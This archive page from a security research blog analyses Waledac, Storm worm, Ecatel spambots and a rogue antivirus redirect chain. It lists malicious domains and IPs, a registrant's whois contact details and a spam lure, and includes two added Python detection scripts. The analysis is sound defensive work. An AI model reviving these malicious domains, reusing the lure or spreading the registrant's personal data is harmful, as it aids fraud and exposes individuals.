sudosecure.net

is anything truly secure…

Archive for the 'Malicious Domain' Category

Kudos to Microsoft with the Waledac Botnet Take down!

Posted by jeremy on 25th February 2010

As many of you have probably read today, Microsoft initiated a large-scale take down operation called “Operation b49” to behead the Waledac Botnet.  This take down effort has definitely made a visible impact on the botnet, as seen here in this recent image taken from my Waledac Botnet tracking scripts.

I applaud their efforts with this take down, and now only time will tell if their strategy will have lasting impacts on this menace of a botnet.  Waledac is a peer-to-peer botnet, so simply taking out command and control servers would not have a lasting impact and the botnet would quickly recover.  By taking down the botnet at the domain (“.com”) level, the individual peers within the botnet will no longer receive peering list updates, command and control instructions, and spam templates, but Waledac is resilient by design, so additional actions have to occur for this take down to be completely successful and/or lasting.

The group and/or groups behind Waledac are most likely still scrambling to understand what occurred and where they went wrong, but with ties to the extinct “Storm Worm” of the past and the Zeus Trojan, which has recently made the news headlines, it is doubtful this will end their criminal efforts.  Only time will tell us what the group’s next move will be, and with that I guess I will have to find another botnet to monitor, so I will be on the lookout.

KUDOS to Microsoft and the behind the scene folks within the security community that aided in this effort!

Posted in Bots and Worms, Malicious Domain, Waledac, spam | No Comments »

Waledac Theme – Couponizer

Posted by jeremy on 22nd February 2009

It appears that the Waledac authors have decided the “love” theme has worn itself out, and have updated the website template to a new theme I have titled the “Couponizer”.  This new theme is right in line with the “sharing” social engineering trickery we have grown to expect from malware authors.  This theme offers to share with you, the unsuspecting website visitor, money saving coupons that can only be found by downloading and installing their binary, which is really the Waledac Trojan.  So instead of them sharing money saving coupons, the end user ends up sharing their bandwidth with the Waledac authors to aid in distributing more of these money saving spam emails and other spamming campaigns.  All of this of course is done free of charge to the compromised host, unless you’re paying for bandwidth under a pay per usage format.  Ouch, if you are having to use one of these outdated plans, as I can only hope those types of plans have long disappeared for your normal residential service connections.  Imagine your phone bill if Waledac could infect your handheld device and utilize minutes on your wireless data plan.  Not a pretty picture if you ask me.

Anyways, let me provide you all with a snapshot of the current web page template, so that we can send out our administrative spam warning our users not to download and install anything from a site that looks like this:

[Image: waledac_couponizer]

So as we can see the theme is not lacking in professionalism.  The major dead giveaway for this template and many of the other Waledac Trojan templates is that every item on the page is really an image.  There is no real text, unless you count the unseen “iframe” lurking behind the scenes hosting several well structured exploits and redirections.  Back to the images: all of the images on the page are hyperlinked to a binary file, so this again is a dead giveaway.  We should warn our users to never install executable content from websites like this.  Hey, better yet, why are we still allowing our users to install binaries anyways?  If we followed the hundreds if not thousands of hardening guides found all over the Internet, I am sure one of the first steps found in almost every one of them is to remove administrator rights from normal usage accounts and create a software distribution and installation policy.  So why are campaigns like this still so effective?  Most likely because we know what the right thing to do is, but many times there are roadblocks in the way that prevent us from implementing policies like these.  On that note, if the DOD can force you to glue your USB ports with some sort of epoxy, I would venture to say removing administrator rights from your users should be an easy accomplishment.  Now if you’re part of the DOD, don’t go sending missiles to my house, as this was just an observation and no pun intended.

It also looks like the polymorphic generation of the Waledac binaries and the rotation of binary names we have seen since the 6th of February, which may I add was exactly 2 days after I posted that the update cycle for the Waledac binaries appeared to be ~15 hours (shame on me), is still well on its way to causing the best of the best Antivirus companies and malware detection companies to stay up late at night or just give up altogether.  I definitely do not fault the Antivirus industry for this poor detection rate, as how do you create static file signatures on something that is constantly changing?  The fault for successful malware campaigns such as Waledac should lie directly on the shoulders of the system security plan authors, ITSMs, CTOs, and security professionals chartered with securing computers and networks.  Stopping Waledac is almost trivial if you will put into place a good patch management system and take away administrative rights for general usage accounts.  Teach those that require administrative rights, such as system administrators, to use the “run as” functionality in Windows; it is there for a reason.  Stop making excuses on why you can’t do these things, and just do it.  I am sure you will feel the pains that all of us that have already removed our users’ administrator rights have felt in dealing with users that believe they need to run their daily accounts as an administrator.  Nobody said computer and network security was an easy task, so let’s just buckle down and fix the fundamental issue here instead of blaming others, such as the Antivirus industry, for our problems.  Hmm, that sounded like a “rant”…

In the meantime, if you can’t pull administrative rights, feel free to utilize the Waledac Tracker on my site to put into place content filters, DNS blackholing, firewall rules, and IDS/IPS signatures to match on content downloads or IP addresses.  I don’t think this is an effective solution, but hey, sometimes you just have to make do with what you’ve got.  On that note, I have been supplying one of my favorite projects, “EmergingThreats.net”, with IP addresses from my Waledac Tracker that have demonstrated some sort of activity in the last 72 hours.  Matt has put into place a mechanism to update his compromised host ruleset with these IP addresses every 24 hours, so you may want to take advantage of this and start using this project’s rulesets if you don’t already.  EmergingThreats.net has come a long way over the last few years, and I can say from personal experience in the IDS world their rulesets do a very good job at detecting botnets and other malicious content that can’t be seen when only running the Snort.org VRT rulesets.  Nothing wrong with the VRT ruleset either, so I would recommend running both of these rulesets and updating constantly.

As always feel free to contact me if you have any questions or comments.

UPDATE: 22 Feb 2009 ~6:00 PM CST (GMT-6)

Much to my surprise there is a legitimate “Couponizer.com” site from which the Waledac authors stole their latest theme.  Give it a look-see here: The Couponizer.  I just sent the admin contact for “The Couponizer.com” website a short note letting them know their reputation is being tarnished as we speak.  Not much they can do about it except maybe put out the standard news release stating they have no involvement with the Waledac Trojan.

Posted in Bots and Worms, Malicious Domain, Waledac | 1 Comment »

Ecatel’s harboring of SpamBots and Malware causes BGP Peers to stop peering with them.

Posted by jeremy on 30th November 2008

Ecatel’s (AS29073) BGP Issues

While I was adding some Google Charts to my SpamBot Comment tracker I noticed that SpamBots originating from the ISP and hosting company Ecatel Network were my number one comment spam offender.  Like any other security researcher I initially performed a Google search and landed on this blog post, “Atrivo, McColo and now Ecatel” by Rune at “Silent noise – about spam, trojans and other nasty stuff”, which sparked my interest and led me to dive deeper into this network.

It appears that several of Ecatel’s Network BGP peers decided to drop peering with them, including Hurricane Electric Internet Service AS6939, which from my research appeared to be their main peering point to the Internet.  The initial drop in peering caused a complete outage for Ecatel’s network, but this was short lived as they were able to obtain peering from Joint Transit.  Joint Transit appears to be their new main peering location to the Internet.  Several customers posted complaints concerning the outages on the public forum WebHosting Talk, which was also documented in Rune’s blog post.  I should also note that Ecatel still has not fully recovered and cannot be reached from a few locations in the US according to this Host-Tracker report I ran while writing this blog post.  I cannot reach Ecatel’s network right now through my ISP, which isn’t a bad thing.

In trying to identify what exactly occurred when the peering locations decided to stop peering with Ecatel, I ran across an extremely useful tool that I had not played with before called “BGPlay” at Route Views.  Using this new toy I was able to graphically replay the BGP route advertisements and withdrawals for the last week for any of the network subnets living on the AS29073 Ecatel Network.  Here is Ecatel’s Network before AS6939 (Hurricane) stopped peering directly with them.

As you can clearly see, Ecatel’s network (AS29073) was communicating out to the Internet via the peer Hurricane (AS6939) for a large percentage of its traffic.  Once Hurricane (AS6939) stopped peering directly with them, Ecatel scrambled to find a new main peering location, which took several hours to do, but eventually they were able to pull it off.  Here is how Ecatel is peering right now:

As you can see from the image above, Ecatel’s peering into the Internet is very different, but it did recover.  I am also sure Ecatel’s customers are seeing a difference in response times and throughput, as Hurricane Electric (AS6939) is ranked #46 by NetConfigs AS Rankings and Joint Transit (AS24785) is ranked #890.

Now that Ecatel has had its hand slapped for harboring this collection of general badness, I can only hope that they have learned their lesson and will start to clean up their network.  It is hand slaps like this that should really start getting ISPs’ and hosting companies’ attention, as a serious loss of revenue could occur if these types of actions continue to be taken.  I can only hope that actions such as ICANN ridding us of EstDomains and the McColo and Atrivo network demise will become the norm.  These types of actions can really start to get the ball rolling in trying to clean up the Internet.  The networks that harbor this type of badness really need to evaluate the costs associated with dealing with these types of customers against the costs associated with losing Internet connectivity from actions taken against them like this.  I am sure the bad guys always pay their bills on time, but if they can’t route to the Internet I am also equally sure they will be in the same line as the good guys asking for a full refund for the services you can no longer provide.  I would also venture to say it would be more cost effective to lose a few bad customers than it would be to take a network outage with the associated bad reputation I am sure you will be labeled with.

SpamBot activities from AS29073 seen at sudosecure.net

Seventeen unique IP addresses originating from this network attempted to post 1965 spam messages since I started tracking spam with my comment spam tracker.  These IPs have been around for a while as you can see from the following table:

Note: Longevity is the number of days between the first seen date and the last seen date and not a true depiction of how long these IPs have been doing this.

Ecatel Network’s Autonomous System (AS) number is AS29073.  This AS number made up ~68% of all comment spam attempts being conducted against this blog.  Obviously the people running the actual SpamBots are not scared of being loud or standing out in a crowd.  Take a look at AS29073 vs. all other AS SpamBot networks in my comment spam tracker database.

The comment spam messages being spewed out by these SpamBots varied, but I did find some interesting trends.  Seven of these IPs were either posting blank messages or garbage messages consisting of seemingly bogus domain names made up of seemingly random text strings.  Here is an example posting from my database:

Here are the 7 IPs posting these types of messages:

  • 200.63.42.136
  • 94.102.60.151
  • 94.102.60.152
  • 94.102.60.153
  • 94.102.60.182
  • 94.102.60.43
  • 94.102.60.77

I am not exactly sure why these SpamBots would be posting such random messages, but I do have a few theories.  My guess is that these few IPs are probing SpamBots that crawl the Internet looking for blogs, forums, or any other website that has comment posting capabilities.  Once these probing SpamBots receive a good server response demonstrating that they are capable of posting spam to a website, they most likely log the website.  These logs are then used to feed URLs to SpamBots that carry the real spam messages and the badness associated with them.  Let me explain why I think this is a technique used by these spammers.  Most websites will block IPs or subscribe to SpamBot tracking databases to create these filters.  If the SpamBot operator sends out these very loud and aggressive probing SpamBots to do the dirty work, it will be these IPs that get added to the ACLs.  This will then allow the real SpamBot to operate in a more effective manner, only spamming the websites that have been identified as being susceptible to spam postings.  This technique aids in keeping the real SpamBot from being placed in ACLs and blacklists.  This also allows the SpamBot operators to accurately predict how many spam messages can be posted at any given time by their SpamBots, and also aids in advertising these capabilities to the organizations that buy SpamBot time.  SpamBot operators are businessmen too, so they try to get the most out of their efforts.  Again, this is just my theory and I have no real evidence that this is the actual technique being utilized here.
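The per-IP bookkeeping behind the numbers in this post (attempt counts, first and last seen, the “longevity” defined in the note above, and a rough sort of postings into blank, garbage-domain and real text) can be sketched as follows. This is an added example written for this page in Python, not the blog’s PHP tracker; the pipe-delimited log format, the randomness heuristic for domain labels and every posting in the sample log are constructed here (only the source IPs are taken from the post).

```python
"""Comment-spam tracker aggregation (added example, not the blog's PHP tracker).

Parses constructed 'timestamp|ip|url|message' log lines, sorts each posting into
'blank', 'garbage-domain' or 'text', and aggregates per source IP the way the
post's tables do: attempts, first/last seen and longevity (days between them).
"""
from collections import defaultdict
from datetime import datetime
import math
import re

# Constructed sample log; only the IPs appear in the blog post.
SAMPLE_LOG = """\
2008-11-20T10:15:00|94.102.60.151||
2008-11-25T03:40:00|94.102.60.151|http://xkqzptwvnr.com|xkqzptwvnr.com zvqtpxmwbk.net
2008-11-28T22:05:00|94.102.60.152||qwrtplkjhg.info
2008-11-29T08:00:00|94.102.49.14|http://example.invalid/wp|Cheap pills online, best prices, order now
2008-11-30T10:30:00|94.102.60.151||
"""

# Matches a hostname, with or without an http(s):// prefix, anywhere in a message.
HOST_RE = re.compile(r'(?:https?://)?\b([A-Za-z0-9-]{2,}(?:\.[A-Za-z0-9-]{2,})+)\b')


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one domain label."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(hostname: str) -> bool:
    """Heuristic (this example's assumption) for 'seemingly random text string'
    domains: the second-level label is long, vowel-poor and high-entropy."""
    labels = hostname.lower().split('.')
    label = labels[-2] if len(labels) >= 2 else labels[0]
    if len(label) < 8:
        return False
    vowel_ratio = sum(ch in 'aeiou' for ch in label) / len(label)
    return vowel_ratio < 0.25 and label_entropy(label) > 3.0


def classify(message: str) -> str:
    """Sort one posting into the three kinds the post describes."""
    text = message.strip()
    if not text:
        return 'blank'
    hosts = HOST_RE.findall(text)
    leftover = HOST_RE.sub(' ', text)            # what remains once hostnames are removed
    has_words = re.search(r'[A-Za-z]{3,}', leftover) is not None
    if hosts and not has_words and all(looks_random(h) for h in hosts):
        return 'garbage-domain'
    return 'text'


def aggregate(log_text: str) -> dict:
    """Per-IP statistics: attempts, first/last seen, longevity and kind counts."""
    stats = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, _url, message = line.split('|', 3)
        seen = datetime.fromisoformat(ts)
        s = stats.setdefault(ip, {'attempts': 0, 'first': seen, 'last': seen,
                                  'kinds': defaultdict(int)})
        s['attempts'] += 1
        s['first'] = min(s['first'], seen)
        s['last'] = max(s['last'], seen)
        s['kinds'][classify(message)] += 1
    for s in stats.values():
        # Longevity as the post's note defines it: days between first and last seen.
        s['longevity_days'] = (s['last'] - s['first']).days
    return stats


def top_offenders(stats: dict) -> list:
    """(ip, attempts) pairs ordered by attempt count, most active first."""
    return sorted(((ip, s['attempts']) for ip, s in stats.items()),
                  key=lambda item: (-item[1], item[0]))


if __name__ == '__main__':
    report = aggregate(SAMPLE_LOG)
    for ip, attempts in top_offenders(report):
        s = report[ip]
        print(f"{ip:15} attempts={attempts} longevity={s['longevity_days']}d "
              f"kinds={dict(s['kinds'])}")
```

The randomness test is deliberately conservative (a short or vowel-rich label never trips it), so ordinary brand names such as wordpress.org fall through to the text bucket; the thresholds are a starting point to tune against your own comment logs, not a signature.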

The next set of 3 IPs spammed pharmaceutical type messages leading to WordPress 2.5.1 templates containing pharmaceutical messages and information spam as well.  Here is a sample from one of the spam messages:

Here is a list of the 3 IPs posting similar messages:

  • 200.63.42.141
  • 94.102.49.14
  • 94.102.60.127

The WordPress templates house some obfuscated JavaScript used to redirect the user to another website.  There is some interesting code used to ensure visitors are not being led to this site via search engine results.  Here is the interesting portion of the code:

Basically the author of this JavaScript is checking to see if any of the major search engines appears in the referrer string, or if the visitor does not have a referrer string set at all.  If either of these conditions is true the value of “gogo” will remain false and the visitor will be presented with the “404 page not found” page.  If both conditions are false the visitor is redirected, in this case to abapharm.net, with a few variables being passed in the URL.  The last three messages posted from these SpamBot IPs redirected to the following domain names:

  • bestcasinogroup.com
  • abapharm.net
  • asiatradefinance.com

These domains seem to be rotated on a regular basis and lead to either pharmaceutical websites or pay per click search redirecting.  The pharmaceutical site I was redirected to during this research was “trustedtabletsworld.com”.  Nothing real interesting there, but the pay per click search redirection sites proved to be a little more interesting.  All of the pay per click hijacking sites were redirecting through one IP:

  • 64.111.196.117

A quick Google search for this IP led me to an outstanding article documenting this type of tunneling, called “Double-Funnel”, by a few Microsoft Security Researchers back in March of 2007.  I am not going to go into the details of how this “Double-Funnel” redirecting tunneling spam stuff works, as this article does a very good job of describing this technique and has some really interesting statistics that I would recommend reading: Spam Double-Funnel: Connecting Web Spammers with Advertisers.  That was the interesting part!

The last set of SpamBot IPs were posting porn spam messages which led to more of this Double-Funnel pay per click search redirecting.  I noticed that this set of SpamBot IP addresses all started off with the initial JavaScript redirection pointing to “xxx.whatsdirect.cn”, which then again redirected to the actual pay per click tunneling server/site.  Two of these SpamBot IPs (94.102.60.166 and 94.102.60.162) had errors in the initial spam message links pointing to “xxx.whatsdirect.com” instead of “xxx.whatsdirect.cn”, so if you’re the paying spam customer utilizing this SpamBot provider to propagate your garbage over the Internet you may want to make sure you get a discount next time, as this typo most likely caused you to lose some money.

Here is a chart to demonstrate how active the individual SpamBots are when compared to one another:

While researching the Ecatel Network (AS29073) originating SpamBots I ran across several forum posts, blog posts, and websites complaining about these IP address ranges.  I even found that several of the well-known spam blacklists had some of these subnets completely blocked.  The Spamhaus Project has some interesting listings for the Ecatel Network in which connections with Russian malware, ROKSO spammers, and even the recent Mac OS X Trojan DNSChanger are documented.  Here is the Spamhaus Report and Jose Nazario’s blog post at Arbor documenting the new Mac Trojan.  Here is a link to my SpamBot Comment Spam Tracker filtered on the AS29073 network, which will be automatically updated as Ecatel SpamBots continue to hit this blog.

As always, if you have any questions or comments regarding my postings feel free to post a comment or contact me via email.

Posted in Malicious Domain, spam | 3 Comments »

Comment Spam leads to rogue Security Applications/Scanners

Posted by jeremy on 24th August 2008

I just recently wrote some PHP code to start tracking comment spam bots, which has led to some interesting findings and statistics. The major goal for this script was to identify the most active comment spam bots by IP, but today I decided to follow some of the URLs in the comment spam postings to see if any badness was waiting for me. The very first URL I followed led to the rogue Antivirus application that has been blogged about and documented heavily all over the net for about a month now and is known by numerous aliases: “Antivirus 2009, Windows XP Antivirus 2009, Antivirus 2008, Antivir64, and XP Antivirus”. In the write-ups I read regarding this rogue Antivirus software I have not really seen anything on comment spam leading to it. Most of the write-ups cover email spam being sent out with catchy subject lines like “Prince Harry Proposes to Paris Hilton, Paris Hilton finds God: God issues denial, Britney Spears Sex Tape, Britney Spears Admits: My Vagina made me shave my head, and Hilton, Lohan, Spears, Duff star in Where The Boys Are remake”.

The instance of comment spam I investigated was posted by IP “189.73.10.64”, which is a host in Brazil with a reverse lookup name of “189-73-10-64.dsl.ctame700.brasiltelecom.net.br”. The comment spam was very simple, with a message of “Nice site, Thanks” and a URL entry of “hxxp://best-savings-accounts.expectgroup.net/best-high-interest-savings-accounts.html”. I would not recommend following this URL as it leads to malicious content. Doing a simple nslookup of best-savings-accounts.expectgroup.net returns the IP “84.16.255.84”, and doing an IP search on Malware Domain List shows this IP has been known to serve up badness: Malware Domain List search results. Both of the sites listed in the search results were linked to the Zlob Trojan. The really interesting thing about this URL was that it was only a redirect to hxxp://virtualblog5.com. Doing an nslookup for virtualblog5.com returned the IP address “84.16.252.138”, and then searching this IP address on Malware Domain List showed this IP has also been known to serve up badness: Malware Domain List search results. All four search results are classified as “rogue”, and given the dates of this IP being reported I would have to assume this is nothing new. Virtualblog5.com was also a redirect to a virtual host on the same server, hxxp://scanner-prot.com, where the real badness surfaced. I was greeted with some simple JavaScript that identified my browser by looking at the User-Agent and then rendered a pop up and redirection to hxxp://scanner.antivir-64.com. Doing an nslookup for antivir-64.com returned two IPs: “78.157.142.7” and “91.203.92.64”. Doing the same simple searches at Malware Domain List provided the following results: 78.157.142.7 and 91.203.92.64 showed these IPs have already been identified as rogue application servers, so again nothing new here. Since this was my final destination in the crafty redirects I did some passive DNS investigations to see what other domains were being seen on these two IP addresses:

  • antivirus2008pro-download1.com A 78.157.142.7
  • antivirus2008pro-download2.com A 78.157.142.7
  • antivir-64.com A 78.157.142.7
  • scanner.antivir-64.com A 78.157.142.7
  • antivir64.com A 78.157.142.7
  • scanner.antivir64.com A 78.157.142.7
  • antivirus-2008a-pro.com A 78.157.142.7
  • antivirus2008t-pro.com A 78.157.142.7
  • antivirus-2008y-pro.com A 78.157.142.7
  • 2008pro-download1.com A 91.203.92.64
  • antivirus2008pro-download2.com A 91.203.92.64
  • antivir-64.com A 91.203.92.64
  • scanner.antivir-64.com A 91.203.92.64
  • antivir64.com A 91.203.92.64
  • scanner.antivir64.com A 91.203.92.64
  • antivirus-2008a-pro.com A 91.203.92.64
  • antivirus2008t-pro.com A 91.203.92.64
  • antivirus-2008y-pro.com A 91.203.92.64
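The pivot just done by hand (take the two IPs the final redirect lands on and ask passive DNS what else lives there) is worth automating, since any name that shares hosting with a known rogue domain inherits its reputation. The Python below is an added example, not code from the post or from any passive-DNS service: the records are the ones listed above, while the seed name, the naming-pattern regex and the two-label “registrable domain” shortcut (which ignores public suffixes) are this example’s own choices.

```python
"""Passive-DNS pivot (added example; not the blog's tooling nor a real pDNS client).

Inverts 'name A ip' records to ip -> names and collects every name co-hosted with
a seed, so rogue-AV domains surface from the infrastructure they share with one
that is already known. The records below are the ones listed in the post.
"""
from collections import defaultdict
import re

PDNS_RECORDS = """\
antivirus2008pro-download1.com A 78.157.142.7
antivirus2008pro-download2.com A 78.157.142.7
antivir-64.com A 78.157.142.7
scanner.antivir-64.com A 78.157.142.7
antivir64.com A 78.157.142.7
scanner.antivir64.com A 78.157.142.7
antivirus-2008a-pro.com A 78.157.142.7
antivirus2008t-pro.com A 78.157.142.7
antivirus-2008y-pro.com A 78.157.142.7
2008pro-download1.com A 91.203.92.64
antivirus2008pro-download2.com A 91.203.92.64
antivir-64.com A 91.203.92.64
scanner.antivir-64.com A 91.203.92.64
antivir64.com A 91.203.92.64
scanner.antivir64.com A 91.203.92.64
antivirus-2008a-pro.com A 91.203.92.64
antivirus2008t-pro.com A 91.203.92.64
antivirus-2008y-pro.com A 91.203.92.64
"""

# Naming pattern chosen for this example after eyeballing the list above.
ROGUE_AV_NAME_RE = re.compile(r'antivir(?:us)?-?(?:64|2008)')


def parse_records(text: str) -> list:
    """Return (name, ip) pairs from 'name A ip' lines; anything else is skipped."""
    pairs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[1].upper() == 'A':
            pairs.append((parts[0].lower().rstrip('.'), parts[2]))
    return pairs


def invert(pairs: list):
    """Build both directions of the index: ip -> names and name -> ips."""
    by_ip, by_name = defaultdict(set), defaultdict(set)
    for name, ip in pairs:
        by_ip[ip].add(name)
        by_name[name].add(ip)
    return by_ip, by_name


def names_per_ip(pairs: list) -> dict:
    """How many distinct names each address has been seen hosting."""
    by_ip, _ = invert(pairs)
    return {ip: len(names) for ip, names in by_ip.items()}


def cohosted(pairs: list, seed: str) -> set:
    """Every name that shared at least one IP with the seed name (seed excluded)."""
    by_ip, by_name = invert(pairs)
    seed = seed.lower().rstrip('.')
    found = set()
    for ip in by_name.get(seed, ()):
        found |= by_ip[ip]
    found.discard(seed)
    return found


def registrable(name: str) -> str:
    """Naive registrable domain: the last two labels (assumption; no public-suffix list)."""
    return '.'.join(name.split('.')[-2:])


def family_hits(names) -> list:
    """Names matching the rogue-AV naming pattern, sorted."""
    return sorted(n for n in names if ROGUE_AV_NAME_RE.search(n))


if __name__ == '__main__':
    pairs = parse_records(PDNS_RECORDS)
    print('names per IP:', names_per_ip(pairs))
    related = cohosted(pairs, 'scanner.antivir-64.com')
    print('co-hosted names:', len(related))
    print('registrable domains:', sorted({registrable(n) for n in related}))
    # Names that share hosting but not the naming pattern deserve a closer look.
    print('outside naming pattern:', sorted(set(related) - set(family_hits(related))))
```

Run against the list above, the one co-hosted name that escapes the naming pattern is 2008pro-download1.com, which is exactly the kind of entry a regex-only blocklist would miss and an infrastructure pivot catches.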

Looking at the domain names associated with these two IPs definitely shows that the comment spam I was investigating is linked to the rogue antivirus spam everyone is discussing. Getting back to the URL tracing, here is a snapshot of the pop up window I received when redirected to this server:

Clicking “OK” will download the rogue antivirus software, which I would not recommend doing. Interestingly enough, this rogue antivirus software is very persistent in trying to get the user to install it, as clicking cancel will redirect you to a fake online virus scanner shown here:

Taking a look at the source code for this page shows the list of files being shown as scanned is stored in a file called: “fileslist.js”. In this file you will find a JavaScript array containing 443 bogus file names used in the scanning animation. Also if any type of click is performed inside the browser window it will cause another pop up window shown here:

Following the instructions presented in these pop up windows will install the rogue antivirus software, but interestingly enough clicking cancel and trying to close the windows will kick off another pop up window shown here:

So as you can tell the rogue antivirus application web page is very persistent in trying to get the visitor to download and install it. This persistence is most likely the reason this campaign has been so widely documented as one mistake from a visitor and the badness is installed.

Now let’s take a look at what a visitor would see if they were to install this rogue security application. I went ahead and downloaded the binary and ran it in my sandbox. The very first installation pop up window looks very professional and presents a license agreement which even includes a limited warranty. Here is a screenshot of this license agreement pop up:

Once the “Continue” button is clicked the rogue security software is installed and the following scan window pops up:

Once the scan is completed the results are another pop up window telling the user multiple files have been found to be infected in some way or another. Here is a snapshot of the results window:

For my investigation I went ahead and chose the “protect this files now” button. Again a pop up window was presented to me showing the different license packages sold for this rogue security software, seen here:

Clicking any one of the “subscribe now” buttons presents you with the following ordering form:

Well, as you can see from reading this post, the comment spam I followed was definitely related to the rogue antivirus software everyone seems to be writing about, or worse yet experiencing its badness firsthand. I haven’t tried to remove this infection as I did this on a sandboxed computer, but I have read many users have had success getting rid of this rogue software application by following these instructions: Bleeping Computers removal instructions.

I also ran the downloaded binary in several online sandboxes which you can check out here: VirusTotal Results 16/36 (44.45%), ThreatExpert Results, and Anubis Results.

One last thing to keep in mind about this rogue security software is that all of this is just one very large and elaborate phishing scam, so if anyone you know comes into contact with this rogue application make sure to advise them to contact their bank and/or credit card companies if they entered their personal information into the purchase form.

Posted in Malicious Domain, Phishing, Rogue Application | 2 Comments »

Storm spam leads to money laundering and more, oh my!

Posted by jeremy on 16th August 2008

Sorry for the lack of coverage this month, as I have been extremely busy catching up with everything after going to Blackhat and Defcon. Anyways, I spent a few hours watching the Storm Worm in my lab last night and this morning and I have identified a few changes since the last time I looked at it. First off, the Storm Worm is not using its rootkit functionality anymore, and the binary installed in %WINDIR% is now named “neos.exe” with its peer hash file being named “crock+mock.config”. The p2p peer hash file contained 857 peers, which is right in line with most of the samples I have taken this year. Here is the decoded IP and port list of those peers found in my sample: peers.txt.

The Storm domain names I have that are still active or more accurately maintain a domain status of “ok”:

  • nationwide2u.cn
  • worldpostcardart.com
  • superlettercard.com
  • yourlettercard.com
  • freepostcardonline.com
  • digitalaudiopostcard.com
  • lettercardadvertising.com
  • bestlettercard.com
  • audiopostcardmail.com
  • supergreetingcard.com
  • oldpostcardshop.com

None of these domains are resolving right now since their name servers are not answering A record requests at this time. The name servers I could identify are:

  • ns.brprbgok6.com 62.33.224.26
  • ns2.brprbgok6.com 124.121.82.50
  • ns3.brprbgok6.com 201.212.95.89
  • ns4.brprbgok6.com 89.109.28.87
  • ns5.brprbgok6.com 193.238.128.177
  • ns6.brprbgok6.com 74.129.81.83

Interestingly enough, the brprbgok6.com domain is in a “clienthold” status, so action has been taken against this domain, but that wouldn’t stop the above name servers from answering requests. Another interesting finding is that these name servers have a TTL of 172800, so they are not following the normal double fast flux structure for which the Storm Worm is famous. This is not abnormal for the Storm Worm either, though, as this type of behavior seems to occur at the end of each campaign and can be thought of as a final stage in the limitless transformations of themes that occur. Once the name servers stop participating in the fast flux design you can almost bet on seeing a new theme within a few days. These new themes also seem to start either on Monday or Tuesday mornings, so we will just have to wait and see if this holds true one more time.

I also found that all of the domains listed at the top of this posting except for the older “nationwide2u.cn” were all registered on the same day using the same registrar and registrant information. Here is a copy of the whois record for one of the domains:

Registrar: RegTime.net Limited
Creation date: 2008-08-03
Expiration date: 2009-08-02

Registrant:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722
Administrative Contact:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722
Technical Contact:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722
Billing Contact:
Alexey Vasiliev
Email: alexvasiliev1987@gmail.com
Organization: Alexey Vasiliev
Address: Ol. Duducha 21/2 58
City: Novosibirsk
State: NSK
ZIP: 630000
Country: RU
Phone: +7.3834427722
Fax: +7.3834427722

The registrar is Regtime.net Limited, a Russian ICANN accredited registrar that has been in business since 2001. This is also the first time I have seen the Storm authors use Regtime.net Limited for registering their domains. Hopefully Regtime.net will take action against these domain names soon, as the “love/postcard” theme seems to be the fall back theme for Storm when new themes begin to lose effectiveness.

The Storm spam seems to be right in line with the norm, with one small exception. This exception is a phishing email that is going out concerning money laundering. Here is a copy of the email message I captured:

Subject: JOB $1800/WEEK – CANADIANS WANTED!
Date: Fri, 15 Aug 2008 16:27:29 -0500
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="Windows-1252";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2499
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2499

We are looking for canadians who would like to work from home
in an administrative support function for businesses.
Many of our clients are small businesses and executives
who are busy and on the go.

Administrative Assistants can work full or part time.
PART TIME ASSISTANTS must work a minimum of 10 hours per week.

Salary varies between $5,000 to $10,000 per month!

If interested,
get back to me at

hxxp://www.vik-budget.com

thank you

.
QUIT

Following the link in the email message will bring you to a phpBB forum posting dated Thu Dec 02, 2004 8:30 pm with a subject line of “Getting Started!” by the moderator of the forum going by the alias “Supplier”, with a total of 34 posts on this message board. This all seemed really odd to me, as I have suggested in the past that individuals were paying for spam, but why would someone pay for spam on such an old outdated posting? Interestingly enough, the vik-budget.com domain seems to be utilizing a fast flux design as well, rotating out A records every 180 seconds and serving up 17 individual IP addresses at a time. Here is a sample dig output just to clarify what I am trying to say:

;; QUESTION SECTION:
;vik-budget.com. IN A

;; ANSWER SECTION:
vik-budget.com. 180 IN A 86.104.87.45
vik-budget.com. 180 IN A 89.33.209.220
vik-budget.com. 180 IN A 93.81.55.7
vik-budget.com. 180 IN A 89.112.76.91
vik-budget.com. 180 IN A 89.47.118.38
vik-budget.com. 180 IN A 91.124.247.62
vik-budget.com. 180 IN A 93.80.234.159
vik-budget.com. 180 IN A 82.179.235.165
vik-budget.com. 180 IN A 79.112.24.125
vik-budget.com. 180 IN A 190.20.206.241
vik-budget.com. 180 IN A 92.100.98.229
vik-budget.com. 180 IN A 89.45.24.174
vik-budget.com. 180 IN A 92.100.21.65
vik-budget.com. 180 IN A 89.178.231.167
vik-budget.com. 180 IN A 81.181.112.38
vik-budget.com. 180 IN A 69.144.198.226

I went ahead and searched all of these IP addresses against the ~180,000 archived IP addresses I have identified in the last six months that may have been associated with the Storm worm at some point in the past. The only one that returned a match against my database was 69.144.198.226, so I don’t think this phishing phpBB site is operating on the Storm fast flux network, but I could be wrong. The name servers are also different for this phishing domain, so again I don’t think it is operating on the Storm fast flux network. Here is a list of the name servers for vik-budget.com:

  • NS1.VIPSAM.COM
  • NS2.VIPSAM.COM
  • NS3.VIPSAM.COM
  • NS4.VIPSAM.COM

